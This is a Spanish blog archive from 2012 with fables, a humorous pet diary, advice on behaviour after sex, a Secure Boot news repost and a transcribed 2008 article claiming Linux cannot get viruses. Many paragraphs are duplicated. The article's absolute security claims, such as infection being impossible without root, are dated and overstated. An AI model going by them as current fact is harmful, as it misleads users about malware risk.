Había una vez, hace cientos de años, en una ciudad de Oriente, un hombre que una noche caminaba por las oscuras calles llevando una lámpara de aceite encendida.
La ciudad era muy oscura en las noches sin luna como aquella.
En determinado momento, se encuentra con un amigo. El amigo lo mira y de pronto lo reconoce.
Se da cuenta de que es Guno, el ciego del pueblo. Entonces, le dice:
- ¿Qué haces Guno, tú ciego, con una lámpara en la mano? Si tú no ves...
Entonces, el ciego le responde:
- Yo no llevo la lámpara para ver mi camino. Yo conozco la oscuridad de las calles de memoria. Llevo la luz para que otros encuentren su camino cuando me vean a mi...
- No solo es importante la luz que me sirve a mí, sino también la que yo uso para que otros puedan también servirse de ella.
Cada uno de nosotros puede alumbrar el camino para uno y para que sea visto por otros, aunque uno aparentemente no lo necesite.
Alumbrar el camino de los otros no es tarea fácil...Muchas veces en vez de alumbrar oscurecemos mucho más el camino de los demás...¿Cómo? A través del desaliento, la crítica, el egoísmo, el desamor, el odio, el resentimiento...
¡Qué hermoso sería sí todos ilumináramos los caminos de los demás!
I am root - Jargon Force - A veces es mejor encender un lanzallamas que maldecir la obscuridad...
30 noviembre 2012
29 noviembre 2012
La canasta
Un hombre rico le entregó
una canasta de basura a un hombre pobre, el hombre pobre corrió con la
canasta, la vació, la lavó, la llenó de flores y se la dió de regreso...
El hombre rico se asombró y le preguntó:
"Por que me ha dado flores, si yo le di Basura?"
El hombre pobre le dijo:
"Porque cada uno da, lo que tiene en el corazón..:"
El hombre rico se asombró y le preguntó:
"Por que me ha dado flores, si yo le di Basura?"
El hombre pobre le dijo:
"Porque cada uno da, lo que tiene en el corazón..:"
28 noviembre 2012
Secure Boot: La Linux Fundation al Rescate
Primero vino Fedora/Red Hat diciendo que usaría las llaves de Microsoft (cosa que también haría openSuse). Luego vino Ubuntu quien pensó en tener su propia llave y además quitar GRUB2 (lo cual le originó críticas desde la FSF peores que la solucion de Fedora). Ahora, James Bottomley, consejero técnico de la Linux Foundation viene con la salvación…………para todas las sus distribuciones (no solo las ya mencionadas)
Se trata de un ligero cambio a la solución de Fedora de usar las llaves de Microsoft. Ellos firmarán además un pre-bootloader que cargará (sin ninguna verificación de firmas) un bootloader prediseñado que a su vez cargará Linux (u otro sistema operativo). Ese pre-bootloader podrá ser usado para distribuciones LiveCD, instaladores CD/DVD o incluso arrancar en modo seguro una distribución que ya esté instalada y elija usarlo. La solución no sólo beneficiaría a los usuarios de GNU/Linux, sino también a los usuarios de los Sistemas Operativos BSD.
Fuentes: Linux Foundation | Muktware
Tomado de: http://blog.desdelinux.net/secure-boot-la-linux-fundation-al-rescate/
27 noviembre 2012
Diario de un perro y de un gato
Diario de un perro
8:00 am - Comida de perros! Mi cosa favorita!
9:30 am - Un paseo en coche! Mi cosa favorita!
9:40 am - Un paseo en el parque! Mi cosa favorita!
10:30 am - Soy frotado y acariciado! Mi cosa favorita!
12:00 am - Almuerzo! Mi cosa favorita!
1:00 pm - Jugar en el patio! Mi cosa favorita!
3:00 pm - Menear el rabo! Mi cosa favorita!
5:00 pm - Hueso! Mi cosa favorita!
7:00 pm - Tengo que jugar a la pelota! Mi cosa favorita!
8:00 pm - Wow! Ver television con la gente! Mi cosa favorita!
11:00 pm - Dormir en la cama! Mi cosa favorita!
Diario de un gato
Dia 752 - Mis captores sigue burlandose de mi con extraños pequeños objetos colgantes. Cenan prodigamente carne fresca, mientras que yo estoy obligado a comer cereal seco. Aunque hago mi desprecio por las raciones perfectamente claro, hay que comer algo para mantener las fuerzas.
Lo unico que me mantiene vivo es la esperanza de escapar, y la satisfaccion leve que recibo arruinando piezas ocasionales del mobiliario. Mañana comere otra planta de la casa.
Hoy mi intento de matar a mis captores rodeando sus pies mientras caminaban casi tuvo exito, debe ser realizado en la parte superior de las escaleras. Como prueba de asco y repulsion volvi a vomitar en la alfombra.
Hoy he decapitado un raton y deje caer su cuerpo sin cabeza a sus pies. Tenia la esperanza de que este ejemplo de muerte metiera el miedo en sus corazones, ya que demuestra claramente lo que soy capaz de hacer. Sin embargo, se limitan a hacer alentadores comentarios sobre lo buen cazador que soy.
Bastardos.
Habia algun tipo de reunion con sus complices esta noche. Me pusieron en una celda de aislamiento durante la duracion del evento. Sin embargo, podia oir ruidos y oler la comida. Oi que mi encierro se debia al poder de "alergias". Debo aprender lo que esto significa y como usarlo a mi favor.
Estoy convencido de que los otros prisioneros aqui son lacayos y soplones. El perro recibe privilegios especiales. El es regularmente liberado y vuelve. Obviamente es retardado.
El pajaro tiene que ser un informador. Observo que se comunica con los guardias regularmente. Estoy seguro de que el reporta todos mis movimientos. Mis captores lo han puesto bajo custodia de proteccion en una celda elevada, por lo que esta seguro... Por ahora.
8:00 am - Comida de perros! Mi cosa favorita!
9:30 am - Un paseo en coche! Mi cosa favorita!
9:40 am - Un paseo en el parque! Mi cosa favorita!
10:30 am - Soy frotado y acariciado! Mi cosa favorita!
12:00 am - Almuerzo! Mi cosa favorita!
1:00 pm - Jugar en el patio! Mi cosa favorita!
3:00 pm - Menear el rabo! Mi cosa favorita!
5:00 pm - Hueso! Mi cosa favorita!
7:00 pm - Tengo que jugar a la pelota! Mi cosa favorita!
8:00 pm - Wow! Ver television con la gente! Mi cosa favorita!
11:00 pm - Dormir en la cama! Mi cosa favorita!
Diario de un gato
Dia 752 - Mis captores sigue burlandose de mi con extraños pequeños objetos colgantes. Cenan prodigamente carne fresca, mientras que yo estoy obligado a comer cereal seco. Aunque hago mi desprecio por las raciones perfectamente claro, hay que comer algo para mantener las fuerzas.
Lo unico que me mantiene vivo es la esperanza de escapar, y la satisfaccion leve que recibo arruinando piezas ocasionales del mobiliario. Mañana comere otra planta de la casa.
Hoy mi intento de matar a mis captores rodeando sus pies mientras caminaban casi tuvo exito, debe ser realizado en la parte superior de las escaleras. Como prueba de asco y repulsion volvi a vomitar en la alfombra.
Hoy he decapitado un raton y deje caer su cuerpo sin cabeza a sus pies. Tenia la esperanza de que este ejemplo de muerte metiera el miedo en sus corazones, ya que demuestra claramente lo que soy capaz de hacer. Sin embargo, se limitan a hacer alentadores comentarios sobre lo buen cazador que soy.
Bastardos.
Habia algun tipo de reunion con sus complices esta noche. Me pusieron en una celda de aislamiento durante la duracion del evento. Sin embargo, podia oir ruidos y oler la comida. Oi que mi encierro se debia al poder de "alergias". Debo aprender lo que esto significa y como usarlo a mi favor.
Estoy convencido de que los otros prisioneros aqui son lacayos y soplones. El perro recibe privilegios especiales. El es regularmente liberado y vuelve. Obviamente es retardado.
El pajaro tiene que ser un informador. Observo que se comunica con los guardias regularmente. Estoy seguro de que el reporta todos mis movimientos. Mis captores lo han puesto bajo custodia de proteccion en una celda elevada, por lo que esta seguro... Por ahora.
26 noviembre 2012
Después del sexo… ¿qué hacemos ?
Secretos para los momentos posteriores.
Las escenas post encuentro sexual pueden ser varias: el legendario cigarrillo, comer algo, hablar de lo ocurrido, una siestita, la tele, el teléfono, un tweet o... ¿te pido un taxi?
Por naturaleza, en un encuentro sexual suelen ser dos los que conectan y comparten. Pero, más allá de esta "sociedad para el placer", sea cual sea el acuerdo o el grado de complicidad o deseo, en cada relación siempre hay un momento de extrema soledad.
El orgasmo es una de esas experiencias íntimas y personales. Cada quien sabe qué emociones y sentimientos estuvieron en juego al llegar esos 10 segundos promedio que suele durar el último tramo del viaje. Y después, ¿qué?
La escena post sexo, sea cual haya sido el juego, orgasmo mediante o no, es otro de esos momentos de extrema individualidad donde lo ideal sería continuar con las caricias hasta retomar la actividad o despedirse hasta la próxima vuelta. Pero cada quien sabe qué suele suceder terminada la experiencia en cuestión.
Si bien no siempre gozamos o sentimos lo mismo finalizado el supuesto pico máximo del encuentro, suele haber estados o rutinas "clásicas" que, más allá de dar pistas sobre nuestra personalidad y la de nuestra pareja, pueden llegar a configurar el comienzo de los encuentros venideros.
¿Qué suele pasar en tu "tercer tiempo"? ¿Qué es lo que no se recomienda que ocurra?
Por lo general, cuando todo culmina, inevitablemente llega la valoración de lo que acaba de ocurrir. El primer gran error, o situación a tener en cuenta para ser evitada, es criticar la actuación del otro. Lo que se calla también cuenta. Debemos tener en cuenta que el "silencio interior post sexo" suele actuar como un reforzador positivo o negativo de lo que acaba de pasar. No es que haya que tomar clases de teatro para evitar lo muchas veces inevitable, pero cada quien deberá saber qué señales poner en juego para comunicar o disimular el balance.
Entre los NO, es fundamental tener en cuenta el efecto que puede provocar el encender el televisor sin consentimiento del otro; así como buscar el teléfono o la PC por curiosidad, para mandar algún tweet o mensaje o, lo que puede ser tomado como un ofensa mortal, para retomar el trabajo que, por un momento, quedó suspendido por el sexo.
Otro de los "no recomendables" es aprovechar el clima "post satisfacción" para negociar "algo en particular", pasar facturas o resolver asuntos pendientes. No todos saben manejar este momento donde se suelen jugar extremas delicadezas.
No meterse en el baño al segundo de haber terminado. Eviten permanecer allí por varios minutos, así lo que más deseen sea una larga ducha. Todo lo que retrase el regreso puede ser interpretado como intento de fuga.
A los que los "mata" el hambre o la sed post competencia, conviden o indaguen amablemente sobre las preferencias del otro.
Puede resultar gracioso o banal, pero muchos no volvieron a tener relaciones por el comportamiento que, ellos o sus acompañantes, han tenido una vez finalizado algún encuentro sexual.
Por naturaleza, en un encuentro sexual suelen ser dos los que conectan y comparten. Pero, más allá de esta "sociedad para el placer", sea cual sea el acuerdo o el grado de complicidad o deseo, en cada relación siempre hay un momento de extrema soledad.
El orgasmo es una de esas experiencias íntimas y personales. Cada quien sabe qué emociones y sentimientos estuvieron en juego al llegar esos 10 segundos promedio que suele durar el último tramo del viaje. Y después, ¿qué?
La escena post sexo, sea cual haya sido el juego, orgasmo mediante o no, es otro de esos momentos de extrema individualidad donde lo ideal sería continuar con las caricias hasta retomar la actividad o despedirse hasta la próxima vuelta. Pero cada quien sabe qué suele suceder terminada la experiencia en cuestión.
Si bien no siempre gozamos o sentimos lo mismo finalizado el supuesto pico máximo del encuentro, suele haber estados o rutinas "clásicas" que, más allá de dar pistas sobre nuestra personalidad y la de nuestra pareja, pueden llegar a configurar el comienzo de los encuentros venideros.
¿Qué suele pasar en tu "tercer tiempo"? ¿Qué es lo que no se recomienda que ocurra?
Por lo general, cuando todo culmina, inevitablemente llega la valoración de lo que acaba de ocurrir. El primer gran error, o situación a tener en cuenta para ser evitada, es criticar la actuación del otro. Lo que se calla también cuenta. Debemos tener en cuenta que el "silencio interior post sexo" suele actuar como un reforzador positivo o negativo de lo que acaba de pasar. No es que haya que tomar clases de teatro para evitar lo muchas veces inevitable, pero cada quien deberá saber qué señales poner en juego para comunicar o disimular el balance.
Entre los NO, es fundamental tener en cuenta el efecto que puede provocar el encender el televisor sin consentimiento del otro; así como buscar el teléfono o la PC por curiosidad, para mandar algún tweet o mensaje o, lo que puede ser tomado como un ofensa mortal, para retomar el trabajo que, por un momento, quedó suspendido por el sexo.
Otro de los "no recomendables" es aprovechar el clima "post satisfacción" para negociar "algo en particular", pasar facturas o resolver asuntos pendientes. No todos saben manejar este momento donde se suelen jugar extremas delicadezas.
No meterse en el baño al segundo de haber terminado. Eviten permanecer allí por varios minutos, así lo que más deseen sea una larga ducha. Todo lo que retrase el regreso puede ser interpretado como intento de fuga.
A los que los "mata" el hambre o la sed post competencia, conviden o indaguen amablemente sobre las preferencias del otro.
Puede resultar gracioso o banal, pero muchos no volvieron a tener relaciones por el comportamiento que, ellos o sus acompañantes, han tenido una vez finalizado algún encuentro sexual.
Tomado de: http://www.acceso365.com/0/vnc/index.vnc?id=despues-del-sexo-que-hacemos
25 noviembre 2012
Virus en GNU/Linux: ¿Realidad o Mito?
Siempre que se forma el debate sobre los Virus y GNU/Linux no tarda en aparecer el usuario (normalmente de Windows) que dice:
100% recomendado. Ahora tendrán un material más que convincente para callar a todo aquel que hable sin una base sólida sobre este tema.
Como siempre digo a mis alumnos: no me creáis, por favor. Descargad e instalaros un rootkit en la máquina. Y si queréis más, leed el código fuente de los “virus” que hay en el mercado. La verdad está en el código fuente. Es difícil a un “autoproclamado” virus seguir nombrándolo de esa forma después de leer su código. Y si no sabéis leer código, una única medida de seguridad sencilla que os recomiendo: usad la cuenta de root solo para administrar la máquina, y mantener al día las actualizaciones de seguridad.
Solamente con eso es imposible que os entren virus y muy poco probable que lo hagan gusanos o que alguien ataque vuestra máquina con éxito.
Tomado de: http://blog.desdelinux.net/virus-en-gnulinux-realidad-o-mito/
“En Linux no hay virus porque los creadores de estos programas malignos no pierden el tiempo en hacer algo para un Sistema Operativo que casi nadie usa”A lo que yo siempre he contestado:
“El problema no es ese, sino que los creadores de estos programas malignos no perderán el tiempo en crear algo que será corregido con la primera actualización que haya del Sistema, incluso, en menos de 24 Horas”Y no me equivocaba, como me lo ha demostrado este excelente artículo publicado en el Número 90 (Año 2008) de La Revista Todo Linux. Su autor David Santo Orcero nos brinda de forma técnica (pero fácil de entender) la explicación del por qué GNU/Linux carece de este tipo de Software malicioso.
100% recomendado. Ahora tendrán un material más que convincente para callar a todo aquel que hable sin una base sólida sobre este tema.
Descargar Artículo (PDF): Mitos y realidades: Linux y los virus
EDITADO:
Aquí tienen el artículo transcrito, pues consideramos que es mucho más cómodo de leer de esta forma:
El debate sobre Linux y los virus no es
algo nuevo. Cada cierto tiempo vemos un correo en alguna lista
preguntando si existen virus para Linux; y automáticamente alguien
responde afirmativamente y alega que si no son más populares es porque
Linux no está tan extendido como Windows. También son frecuentes las
notas de prensa de desarrolladores de antivirus diciendo que sacan
versiones contra los virus de Linux.
Personalmente he tenido alguna que otra
discusión con distintas personas por correo, o por lista de
distribución, respecto al tema de si existen o no los virus en Linux. se
trata de un mito, pero es complejo derribar un mito o, mejor dicho, un
bulo, especialmente si está causado por interés económico. A alguien le
interesa transmitir la idea de que si Linux no tiene este tipo de
problemas, es porque muy poca gente lo utiliza.
A la hora de publicar este reportaje me
hubiese gustado elaborar un texto definitivo sobre la existencia de
virus en Linux. Desgraciadamente, cuando la superstición y el interés
económico campan a sus anchas, es difícil construir algo definitivo.
No obstante, intentaremos hacer aquí un argumentario razonablemente completo para desarmar los ataques de cualquiera que quiera discutirlo.
No obstante, intentaremos hacer aquí un argumentario razonablemente completo para desarmar los ataques de cualquiera que quiera discutirlo.
¿Qué es un Virus?
Lo primero, vamos a comenzar definiendo
qué es un virus. se trata de un programa que se copia y se ejecuta
automáticamente, y que tiene por objeto alterar el normal funcionamiento
de un ordenador, sin el permiso o el conocimiento del usuario. Para
ello, los virus reemplazan archivos ejecutables por otros infectados con
su código. La definición es estándar, y es un resumen de una línea de
la entrada sobre virus que aparece en la Wikipedia.
La parte más importante de esta definición, y la que diferencia el virus del resto del malware, es que un virus se instala solo, sin el permiso o conocimiento del usuario. si no se instala solo, no es un virus: podría ser un ser un rootkit, o un troyano.
La parte más importante de esta definición, y la que diferencia el virus del resto del malware, es que un virus se instala solo, sin el permiso o conocimiento del usuario. si no se instala solo, no es un virus: podría ser un ser un rootkit, o un troyano.
Un rootkit es un parche al kernel que
permite ocultar determinados procesos a las utilidades de área de
usuario. Dicho de otra forma, es una modificación del código fuente del
kernel que tiene como objeto que las utilidades que permiten ver qué se
está ejecutando en cada momento no visualicen un determinado proceso, o
un determinado usuario.
Un troyano es análogo: es una
modificación al código fuente de un servicio concreto para ocultar
determinada ac tividad fraudulenta. En ambos casos es necesario obtener
el código fuente de la versión exacta instalada en la máquina Linux,
parchear el código, recompilarlo, obtener privilegios de administrador,
instalar el ejecutable parcheado, e inicializar el servicio –en el caso
del troyano– o el sistema operativo completo –en el caso del
rootkit–. El proceso, como vemos, no es trivial, y nadie puede hacer todo esto “por error”. Tanto unos como otros exigen en su instalación que alguien con privilegios de administrador, de forma consciente, ejecute una serie de pasos tomando decisiones de índole técnica.
rootkit–. El proceso, como vemos, no es trivial, y nadie puede hacer todo esto “por error”. Tanto unos como otros exigen en su instalación que alguien con privilegios de administrador, de forma consciente, ejecute una serie de pasos tomando decisiones de índole técnica.
Lo cual no es un matiz semántico sin
importancia: para que un virus se instale, basta con que ejecutemos un
programa infectado como usuario común. Por otro lado, para la
instalación de un rootkit o de un troyano es imprescindible que un
humano malicioso entre personalmente en la cuenta de root de una
máquina, y de forma no automatizada realice una serie de pasos que son
potencialmente detectables. un virus se propaga con rapidez y
eficiencia; un rootkit o un troyano necesitan que vayan específicamente a
por nosotros.
La transmición de virus en Linux:
El mecanismo de transmisión de un virus,
por lo tanto, es lo que realmente lo define como tal, y es la base de
la existencia de los mismos. un sistema operativo es más sensible a los
virus cuanto más fácil sea desarrollar un mecanismo eficiente y
automatizado de transmisión de estos.
Supongamos que tenemos un virus que
quiere transmitirse solo. Supongamosque ha sido lanzado por un usuario
normal, de forma inocente, al lanzar un programa. Dicho virus tiene
exclusivamente dos mecanismos de transmisión:
- Replicarse tocando la memoria de otros procesos, anclándose a ellos en tiempo de ejecución.
- Abriendo los ejecutables del sistema de ficheros, y añadiendo su código –payload– al ejecutable.
Todos los virus que podemos considerar
como tales tienen al menos uno de estos dos mecanismos de transmisión. O
los dos. No hay más mecanismos.
Respecto al primer mecanismo, recordemos la arquitectura de memoria virtual de Linux y cómo funcionan los procesadores intel. Estos poseen cuatro anillos, numerados de 0 a 3; a menor número, mayores los privilegios que tiene el código que se ejecute en dicho anillo. Estos anillos corresponden con estados del procesador, y, por lo tanto, con lo que se puede hacer con un sistema estando en un anillo concreto. Linux hace uso del anillo 0 para el kernel, y del anillo 3 para los procesos. no hay código de proceso que se ejecute en anillo 0, y no hay código de kernel que se ejecute en anillo 3. Solo hay un único punto de entrada al kernel desde el anillo 3: la interrupción 80h, que permite saltar del área donde está el código de usuario al área donde está el código de kernel.
Respecto al primer mecanismo, recordemos la arquitectura de memoria virtual de Linux y cómo funcionan los procesadores intel. Estos poseen cuatro anillos, numerados de 0 a 3; a menor número, mayores los privilegios que tiene el código que se ejecute en dicho anillo. Estos anillos corresponden con estados del procesador, y, por lo tanto, con lo que se puede hacer con un sistema estando en un anillo concreto. Linux hace uso del anillo 0 para el kernel, y del anillo 3 para los procesos. no hay código de proceso que se ejecute en anillo 0, y no hay código de kernel que se ejecute en anillo 3. Solo hay un único punto de entrada al kernel desde el anillo 3: la interrupción 80h, que permite saltar del área donde está el código de usuario al área donde está el código de kernel.
La arquitectura de Unix en general y de Linux en particular no hace factible la dispersión de virus.
El kernel mediante el uso de la memoria
virtual hace creer a cada proceso que tiene toda la memoria para él
solo. Un proceso –que trabaja en anillo 3– solo puede ver la memoria
virtual que le han configurado, por el anillo en el que opera. No es que
la memoria de los otros procesos esté protegida; es que para un proceso
la memoria de los otros está fuera del espacio de direcciones. Si un
proceso diese una batida a todas las direcciones de memoria, no sería
capaz ni de referenciar una dirección de memoria de otro proceso.
¿Por qué esto no se puede trampear?
Para modificar lo comentado –por ejemplo, generar puntos de entrada en anillo 0, modificar los vectores de interrupciones, modificar la memoria virtual, modificar la LGDT…– solo es posible desde el anillo 0.
Es decir, para que un proceso pudiese tocar la memoria de otros procesos o del kernel, debería ser el propio kernel. Y el hecho de que haya un único punto de entrada y que los parámetros se pasen por registros complica la trampa –de hecho, se pasa por registro hasta lo que se debe hacer, que se implementa luego como un case en la rutina de atención a la interrupción 80h–.
Otro escenario es el caso de sistemas operativos con cientos de llamadas no documentadas al anillo 0, donde esto sí es posible –siempre puede quedar una llamada olvidada mal implementada sobre la que se pueda desarrollar una trampa–, pero en caso de un sistema operativo con un mecanismo de paso tan simple, no lo es.
Para modificar lo comentado –por ejemplo, generar puntos de entrada en anillo 0, modificar los vectores de interrupciones, modificar la memoria virtual, modificar la LGDT…– solo es posible desde el anillo 0.
Es decir, para que un proceso pudiese tocar la memoria de otros procesos o del kernel, debería ser el propio kernel. Y el hecho de que haya un único punto de entrada y que los parámetros se pasen por registros complica la trampa –de hecho, se pasa por registro hasta lo que se debe hacer, que se implementa luego como un case en la rutina de atención a la interrupción 80h–.
Otro escenario es el caso de sistemas operativos con cientos de llamadas no documentadas al anillo 0, donde esto sí es posible –siempre puede quedar una llamada olvidada mal implementada sobre la que se pueda desarrollar una trampa–, pero en caso de un sistema operativo con un mecanismo de paso tan simple, no lo es.
Por ello, la arquitectura de memoria
virtual impide este mecanismo de transmisión; ningún proceso –ni
siquiera los que tienen privilegios de root– tienen forma de acceder a
la memoria de otros. Podríamos argumentar que un proceso puede ver el
kernel; lo tiene mapeado a partir de su dirección de memoria lógica
0xC0000000. Pero, por el anillo del procesador en el que se ejecuta, no
puede modificarlo; generaría un trap, ya que son zonas de memoria que
pertenecen a otro anillo.
La “solución” sería un programa que
modificara el código del kernel cuando es un fichero. Pero el hecho de
que estos se recompilen, lo hace imposible. No se puede parchear el
binario, ya que hay millones de kernels binarios distintos en el mundo.
Simplemente con que al recompilarlo le hubiesen puesto o quitado algo al
ejecutable del kernel, o le hubiesen cambiado el tamaño de alguna de
las etiquetas que identifican la versión de compilación –algo que se
hace incluso involuntariamente– el parche binario no se podría aplicar.
La alternativa sería descargar el código fuente de Internet, parchearlo,
configurarlo para el hardware apropiado, compilarlo, instalarlo y
reiniciar la máquina. Todo esto lo debería hacer un programa, de forma
automática. Todo un reto para el campo de la Inteligencia Artificial.
Como vemos, ni siquiera un virus como root puede saltar esta barrera. La única solución que queda es la transmisión entre ficheros ejecutables. Lo que tampoco funciona como veremos a continuación.
Como vemos, ni siquiera un virus como root puede saltar esta barrera. La única solución que queda es la transmisión entre ficheros ejecutables. Lo que tampoco funciona como veremos a continuación.
Mi experiencia como administrador:
En más de diez años que llevo
administrando Linux, con instalaciones en cientos de máquinas de centros
de cálculo, laboratorios de alumnos, empresas, etc.
- Nunca me ha “entrado” un virus
- Nunca he conocido a alguien que le haya ocurrido
- Nunca he conocido a alguien que haya conocido a alguien que le haya ocurrido
Conozco a más gente que ha visto al monstruo del Lago Ness a que haya visto virus para Linux.
Personalmente, reconozco que he sido un temerario, y he lanzado varios programas que los autoprocramados “especialistas” denominan “virus para Linux” -en adelante, los denominaré virus, para no hacer pedante el texto-, desde mi cuenta habitual contra mi máquina, para ver si es posible un virus: tanto el virus bash que circula por ahí -y que, por cierto, no me infectó ningún fichero-, como un virus que se hizo muy famoso, y salió en la prensa. Intenté instalarmelo; y después de veinte minutos de trabajo, me rendí cuando vi que entre sus exigencias estaba tener el directorio tmp en una partición del tipo MSDOS. Personalmente, no conozco a nadie que cree una partición específica para tmp y la formatee en FAT.
De hecho, algunos supuestos virus que he probado para Linux necesitan un nivel de conocimientos altos y la clave de root para ser instalados. Podríamos calificar, cuanto menos, de “cutre” un virus si necesita nuestra intervención activa para que nos infecte la máquina. Además, en algún caso requieren amplios conocimientos de UNIX y la clave de root; lo que está bastante lejos de la instalación automática que se le supone.
Personalmente, reconozco que he sido un temerario, y he lanzado varios programas que los autoprocramados “especialistas” denominan “virus para Linux” -en adelante, los denominaré virus, para no hacer pedante el texto-, desde mi cuenta habitual contra mi máquina, para ver si es posible un virus: tanto el virus bash que circula por ahí -y que, por cierto, no me infectó ningún fichero-, como un virus que se hizo muy famoso, y salió en la prensa. Intenté instalarmelo; y después de veinte minutos de trabajo, me rendí cuando vi que entre sus exigencias estaba tener el directorio tmp en una partición del tipo MSDOS. Personalmente, no conozco a nadie que cree una partición específica para tmp y la formatee en FAT.
De hecho, algunos supuestos virus que he probado para Linux necesitan un nivel de conocimientos altos y la clave de root para ser instalados. Podríamos calificar, cuanto menos, de “cutre” un virus si necesita nuestra intervención activa para que nos infecte la máquina. Además, en algún caso requieren amplios conocimientos de UNIX y la clave de root; lo que está bastante lejos de la instalación automática que se le supone.
Infectando ejecutables en Linux:
En Linux, un proceso puede hacer
simplemente lo que le permita su usuario efectivo y su grupo efectivo.
Es cierto que existen mecanismos para intercambiar el usuario real con
el efectivo, pero poco más. Si nos fijamos donde están los ejecutables,
veremos que solamente root tiene privilegios de escritura tanto en
dichos directorios, como en los ficheros contenidos. Dicho de otro modo,
solamente root puede modificar dichos archivos. Esto es así en Unix
desde los 70, en Linux desde sus orígenes, y en un sistema de ficheros
que soporte privilegios, aún no ha aparecido ningún error que permita
otro comportamiento. La estructura de los ficheros ejecutables ELF es
conocida y está bien documentada, por lo que es técnicamente posible que
un fichero de este tipo cargue el payload en otro fichero ELF… siempre
que el usuario efectivo del primero o el grupo efectivo del primero
tengan privilegios de lectura, escritura y ejecución sobre el segundo
fichero. ¿Cuántos ejecutables del sistema de ficheros podría infectar
como usuario común?
Esta pregunta tiene una respuesta simple, si queremos saber a cuántos ficheros podríamos “infectar”, lanzamos el comando:
Esta pregunta tiene una respuesta simple, si queremos saber a cuántos ficheros podríamos “infectar”, lanzamos el comando:
$ find / -type f -perm -o=rwx -o
\( -perm -g=rwx -group `id -g` \) -o \( -perm -u=rwx -user `id -u` \)
-print 2> /dev/null | grep -v /proc
Excluimos el directorio /proc porque es
un sistema de ficheros virtual que muestra información sobre cómo
funciona el sistema operativo. Los archivos de tipo fichero y con
privilegios de ejecución que encontraremos no suponen un problema, ya
que con frecuencia son enlaces virtuales que constan como que pueden
leerse, escribirse y ejecutarse, y si un usuario lo intenta, nunca
funciona. También descartamos los errores, abundantes –ya que,
especialmente en /proc y en /home, hay muchos directorios donde un
usuario común no puede entrar–.Este script tarda bastante. En nuestro
caso particular, en una máquina donde trabajamos cuatro personas, la
respuesta fue:
/tmp/.ICE-unix/dcop52651205225188
/tmp/.ICE-unix/5279
/home/irbis/kradview-1.2/src
/kradview
La salida muestra tres ficheros que
podrían infectarse si se ejecutase un hipotético virus. Los dos primeros
son ficheros de tipo Unix socket que se borran en arranque –y que no
pueden verse afectados por un virus–, y el tercero es un fichero de un
programa en desarrollo, que cada vez que se recompila se borra. El
virus, desde el punto de vista práctico, no se propagaría.
Por lo que vemos, la única forma de propagar el payload es siendo root. En ese caso para que un virus funcione es necesario que los usuarios tengan siempre privilegios de administrador. En ese caso sí puede infectar archivos. Pero aquí viene la trampa: para transmitir la infección, necesita tomar otro ejecutable, mandarlo por correo a otro usuario que solamente emplee la máquina como root, y que repita el proceso.
En sistemas operativos donde es necesario ser administrador para tareas comunes o para ejecutar muchas aplicaciones diarias, esto sí se puede dar. Pero en Unix es necesario ser administrador para configurar la máquina y modificar los archivos de configuración, así que es escaso el número de usuarios que emplea como cuenta diaria la de root. Es más; algunas distribuciones de Linux ni siquiera tienen habilitada la cuenta de root. En casi todas, si accedes como tal al entorno gráfico, el fondo se cambia a rojo intenso, y se repiten mensajes constantes que recuerdan que no se debe emplear esta cuenta.
Finalmente, todo lo que se debe hacer como root es posible hacerlo mediante un comando sudo sin riesgo.
Por ello, en Linux un ejecutable no puede infectar a otros siempre que no estemos usando la cuenta de root como cuenta de uso común; y aunque las compañías antivirus se empeñan en decir que hay virus para Linux, realmente lo más parecido que se puede crear en Linux es un troyano en área de usuario. La única forma de que estos troyanos puedan afectar algo del sistema es ejecutándolo como root y con lo privilegios necesarios. Si solemos emplear la máquina como usuarios de a pie, no es posible que un proceso lanzado por un usuario común infecte al sistema.
Por lo que vemos, la única forma de propagar el payload es siendo root. En ese caso para que un virus funcione es necesario que los usuarios tengan siempre privilegios de administrador. En ese caso sí puede infectar archivos. Pero aquí viene la trampa: para transmitir la infección, necesita tomar otro ejecutable, mandarlo por correo a otro usuario que solamente emplee la máquina como root, y que repita el proceso.
En sistemas operativos donde es necesario ser administrador para tareas comunes o para ejecutar muchas aplicaciones diarias, esto sí se puede dar. Pero en Unix es necesario ser administrador para configurar la máquina y modificar los archivos de configuración, así que es escaso el número de usuarios que emplea como cuenta diaria la de root. Es más; algunas distribuciones de Linux ni siquiera tienen habilitada la cuenta de root. En casi todas, si accedes como tal al entorno gráfico, el fondo se cambia a rojo intenso, y se repiten mensajes constantes que recuerdan que no se debe emplear esta cuenta.
Finalmente, todo lo que se debe hacer como root es posible hacerlo mediante un comando sudo sin riesgo.
Por ello, en Linux un ejecutable no puede infectar a otros siempre que no estemos usando la cuenta de root como cuenta de uso común; y aunque las compañías antivirus se empeñan en decir que hay virus para Linux, realmente lo más parecido que se puede crear en Linux es un troyano en área de usuario. La única forma de que estos troyanos puedan afectar algo del sistema es ejecutándolo como root y con lo privilegios necesarios. Si solemos emplear la máquina como usuarios de a pie, no es posible que un proceso lanzado por un usuario común infecte al sistema.
Mitos y mentiras:
Encontramos una gran cantidad de mitos,
bulos y simplemente mentiras sobre los virus en Linux. Hagamos una
relación de los mismos basándonos en una discusión acontecida hace ya
tiempo con un representante de un fabricante de antivirus para Linux que
se ofendió mucho por un artículo publicado en esta misma revista.
Aquella discusión es un buen ejemplo de referencia, ya que toca todos los aspectos sobre los virus en Linux. Vamos a repasar todos estos mitos uno a uno según se comentaron en aquella discusión concreta, pero que tantas veces se ha repetido en otros foros.
Aquella discusión es un buen ejemplo de referencia, ya que toca todos los aspectos sobre los virus en Linux. Vamos a repasar todos estos mitos uno a uno según se comentaron en aquella discusión concreta, pero que tantas veces se ha repetido en otros foros.
Mito 1:Respuesta:
“No todos los programas malignos, particularmente los virus, necesitan privilegios de root para infectar, sobre todo en el caso particular de los virus ejecutables (formato ELF) que infectan otros ejecutables”.
Quien realice semejante afirmación desconoce cómo funciona el sistema de privilegios de Unix. Para poder afectar a un fichero, un virus necesita el privilegio de lectura –hay que leerlo para modificarlo–, y de escritura –hay que escribirlo para que la modificación sea válida– sobre el fichero del ejecutable que quiere ejecutar.
Esto es así siempre, sin excepciones. Y en todas y cada una de las distribuciones, los usuarios que no son root no disponen de estos privilegios. Luego simplemente con no ser root, la infección no es posible. Prueba empírica: En la sección anterior vimos un simple script para comprobar el rango de ficheros que pueden ser afectados por una infección. Si lo lanzamos en nuestra máquina, veremos como es ínfimo, y respecto a ficheros de sistema, nulo. Además, a diferencia de operativos como Windows, no es necesario tener privilegios de administrador para realizar tareas comunes con programas que emplean comúnmente usuarios normales.
Mito 2:
